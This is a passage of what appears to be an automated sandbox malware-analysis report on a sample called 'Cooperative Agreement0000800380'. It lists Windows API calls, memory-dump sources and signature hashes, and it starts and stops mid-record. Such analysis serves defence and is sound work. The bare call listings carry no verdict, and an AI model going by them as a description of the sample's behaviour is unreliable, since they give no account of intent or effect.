                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
                                                                                                                                                                                                                                        • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
                                                                                                                                                                                                                                        • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
                                                                                                                                                                                                                                        • wcslen.MSVCRT ref: 00409189
                                                                                                                                                                                                                                        • wcslen.MSVCRT ref: 00409191
                                                                                                                                                                                                                                        • SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
                                                                                                                                                                                                                                        • CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
                                                                                                                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
                                                                                                                                                                                                                                        • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
                                                                                                                                                                                                                                        • SetForegroundWindow.USER32(00000000), ref: 0040921F
                                                                                                                                                                                                                                        • BringWindowToTop.USER32(00000000), ref: 00409226
                                                                                                                                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
                                                                                                                                                                                                                                        • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
                                                                                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00409259
                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00409264
                                                                                                                                                                                                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 00409278
                                                                                                                                                                                                                                        • wcslen.MSVCRT ref: 00409289
                                                                                                                                                                                                                                        • wcscpy.MSVCRT ref: 004092A1
                                                                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                                                                                                                                                                                                                                        • String ID: 0$BUTTON$D0A$EDIT$STATIC
                                                                                                                                                                                                                                        • API String ID: 54849019-2968808370
                                                                                                                                                                                                                                        • Opcode ID: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
                                                                                                                                                                                                                                        • Instruction ID: 83f6c24ff00e7acae504a8cc9f4403d446bfccf5cce4438541287e2077ea33a9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E91A070648304BFE7219F64DC49F9B7FA9FB48B50F00893EF644A61E1CBB988448B59
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401637
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                                          • Part of subcall function 004057F0: wcsncmp.MSVCRT ref: 00405853
                                                                                                                                                                                                                                          • Part of subcall function 004057F0: memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
                                                                                                                                                                                                                                          • Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02390000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                                          • Part of subcall function 0040A6C5: wcsncpy.MSVCRT ref: 0040A6E3
                                                                                                                                                                                                                                          • Part of subcall function 0040A6C5: wcslen.MSVCRT ref: 0040A6F5
                                                                                                                                                                                                                                          • Part of subcall function 0040A6C5: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A735
                                                                                                                                                                                                                                          • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
                                                                                                                                                                                                                                        • String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$fpA$fpA$fpA$fpA$fpA
                                                                                                                                                                                                                                        • API String ID: 1295435411-3159487945
                                                                                                                                                                                                                                        • Opcode ID: e02ab6fb7fb026371ba0f3169e7b8a9095618f3e0d19e2e904a50f584859e1f7
                                                                                                                                                                                                                                        • Instruction ID: b4e4a0b709d291d116e2253cfe1eb4aef96e8d0e4325569d50da54c09323f468
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e02ab6fb7fb026371ba0f3169e7b8a9095618f3e0d19e2e904a50f584859e1f7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E3B134B1504300AED600BBA1DD81E7F77A9EB88308F108D3FF544B61A2CA3DDD59966D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00409373
                                                                                                                                                                                                                                          • Part of subcall function 0040E3F0: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040E3FA
                                                                                                                                                                                                                                        • memset.MSVCRT ref: 00409381
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                                                                                                                                                                                                                                        • wcsncpy.MSVCRT ref: 004093DD
                                                                                                                                                                                                                                        • wcslen.MSVCRT ref: 004093F1
                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(?), ref: 0040947A
                                                                                                                                                                                                                                        • wcslen.MSVCRT ref: 00409481
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
                                                                                                                                                                                                                                        • String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                                                                                                                                                                                                        • API String ID: 4193992262-92458654
                                                                                                                                                                                                                                        • Opcode ID: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
                                                                                                                                                                                                                                        • Instruction ID: 23f57ca1c929181bfbc58391faabb4ebc57556df945843c0c8e437b0019b5ca4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D3416471508704AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B6A
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • wcsncpy.MSVCRT ref: 00406405
                                                                                                                                                                                                                                          • Part of subcall function 0040E1E0: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E1EA
                                                                                                                                                                                                                                        • _wcsdup.MSVCRT ref: 0040644E
                                                                                                                                                                                                                                        • _wcsdup.MSVCRT ref: 00406469
                                                                                                                                                                                                                                        • _wcsdup.MSVCRT ref: 0040648C
                                                                                                                                                                                                                                        • wcsncpy.MSVCRT ref: 00406578
                                                                                                                                                                                                                                        • free.MSVCRT ref: 004065DC
                                                                                                                                                                                                                                        • free.MSVCRT ref: 004065EF
                                                                                                                                                                                                                                        • free.MSVCRT ref: 00406602
                                                                                                                                                                                                                                        • wcsncpy.MSVCRT ref: 0040662E
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsdupfreewcsncpy$Value
                                                                                                                                                                                                                                        • String ID: $0A$$0A$$0A
                                                                                                                                                                                                                                        • API String ID: 1554701960-360074770
                                                                                                                                                                                                                                        • Opcode ID: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
                                                                                                                                                                                                                                        • Instruction ID: a3954b37eea6ac6c251c7ba509b6f2d99b081bbe67bc4aeebc7e0be9c04ba548
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30A1BD715043019BCB209F18C881A2BB7F1EF94348F49093EF88667391E77AD965CB9A
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                                                                                                                                                                                                                          • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02390000,00000000,?,?), ref: 0040E2C7
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040A863
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A875
                                                                                                                                                                                                                                        • wcscpy.MSVCRT ref: 0040A89B
                                                                                                                                                                                                                                        • wcscat.MSVCRT ref: 0040A8A6
                                                                                                                                                                                                                                        • wcslen.MSVCRT ref: 0040A8AC
                                                                                                                                                                                                                                        • CoTaskMemFree.OLE32(?,00000000,00000000,?,02399740,00000000,00000000), ref: 0040A8BA
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,004046B8,00000000), ref: 0040A8C1
                                                                                                                                                                                                                                        • wcscat.MSVCRT ref: 0040A8D9
                                                                                                                                                                                                                                        • wcslen.MSVCRT ref: 0040A8DF
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FreeLibrarywcscatwcslen$AddressAllocHeapLoadProcTaskValuewcscpy
                                                                                                                                                                                                                                        • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                                                                                                                                                                                                        • API String ID: 1740785346-287042676
                                                                                                                                                                                                                                        • Opcode ID: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
                                                                                                                                                                                                                                        • Instruction ID: ae609db33c227b916d8c96984f24cc4820d8d1ee700964f601e6ad2a5a3ba7d8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ace73f6e0916171b361586c2bbf184c955ba55397e49a90223a244ca9597bb20
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C821F871344701B6D2303B62EC4EF6F2A78DB91B90F11483BF901B51D2D6BC8A6199AF
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • TlsAlloc.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00412092
                                                                                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 0041209E
                                                                                                                                                                                                                                        • TlsGetValue.KERNEL32(?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 004120B4
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120CE
                                                                                                                                                                                                                                        • EnterCriticalSection.KERNEL32(00418688,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 004120DF
                                                                                                                                                                                                                                        • LeaveCriticalSection.KERNEL32(00418688,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 004120FB
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000), ref: 00412114
                                                                                                                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00412117
                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 0041211E
                                                                                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412121
                                                                                                                                                                                                                                        • RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041217A,00000000,000000FF,00000008), ref: 00412137
                                                                                                                                                                                                                                        • TlsSetValue.KERNEL32(00000000,?,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412144
                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E018,0040DF80,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00412155
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 298514914-0
                                                                                                                                                                                                                                        • Opcode ID: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
                                                                                                                                                                                                                                        • Instruction ID: d80fd07e77255670f12a4e616af7295cf706cbaed93ad9a0fedfb01b657d880b
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 090f9e8ec264e5d12bc44ccd603b7065f48900f7029304d299a0ea3cd3686378
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35211971644305FFDB119F64ED88B963FBAFB49311F04C43AFA09962A1CBB49850DB68
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403302
                                                                                                                                                                                                                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040330B
                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 0040342B
                                                                                                                                                                                                                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00403434
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02390000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040333B
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                                          • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                                          • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02390000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403468
                                                                                                                                                                                                                                        • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 00403471
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                                                                                                                                                                                                                                        • String ID: sysnative
                                                                                                                                                                                                                                        • API String ID: 3406704365-821172135
                                                                                                                                                                                                                                        • Opcode ID: 3c1d31c8affcdc6d165275096a5574497656667687e3c5a1ea8ed31f7b3a2118
                                                                                                                                                                                                                                        • Instruction ID: 2364f58bb10a159e0aa11294c57d56a9f179ba7a21fd77f55822fae8b4f54734
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3c1d31c8affcdc6d165275096a5574497656667687e3c5a1ea8ed31f7b3a2118
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F5514075518701AAD600BBB2CC82B2F76A9AFD0709F10CC3FF544790D2CA7CD8599A6E
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040D855,0041861C,0040D9E2,00000000,FFFFFFED,00000200,76ED5E70,00409E76,FFFFFFED,00000010), ref: 0040DA51
                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA66
                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA81
                                                                                                                                                                                                                                        • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040DA90
                                                                                                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DAA2
                                                                                                                                                                                                                                        • InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040DAB5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                                                                                                                                                                                                                                        • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                                                                                                                                                                                                        • API String ID: 2918862794-1339284965
                                                                                                                                                                                                                                        • Opcode ID: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
                                                                                                                                                                                                                                        • Instruction ID: e7d3430369b103de8e34323ddaa6381870798cc52ac97d2691a1b23ef8b22f52
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 04ec49063c38c3d68cea197a5330db743d42037b633bf3bb84411c831da1e2b1
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A701B132748204BAD7116FE49C49FEB3B29EF42762F10813AF905A11C0DB7C49458A6D
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0040951F
                                                                                                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 00409526
                                                                                                                                                                                                                                          • Part of subcall function 0040DB72: HeapAlloc.KERNEL32(00000008,00000000,0040D3EC,00418610,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB7E
                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00409543
                                                                                                                                                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00409550
                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 0040955E
                                                                                                                                                                                                                                        • IsWindowEnabled.USER32(?), ref: 00409569
                                                                                                                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 00409579
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2392050994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392012967.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392097564.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392137690.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2392175159.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Cooperative Agreement0000800380.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3383493704-0
                                                                                                                                                                                                                                        • Opcode ID: 761db0cbe0c8efe4181c57131f09a45cb1cea28f7de62a6f083fb5992236dbff
                                                                                                                                                                                                                                        • Instruction ID: 9be2ebae674c1fa36b8fc713cd4e728ef3198b0ad07c7790c0b3041e5f2a4f9d
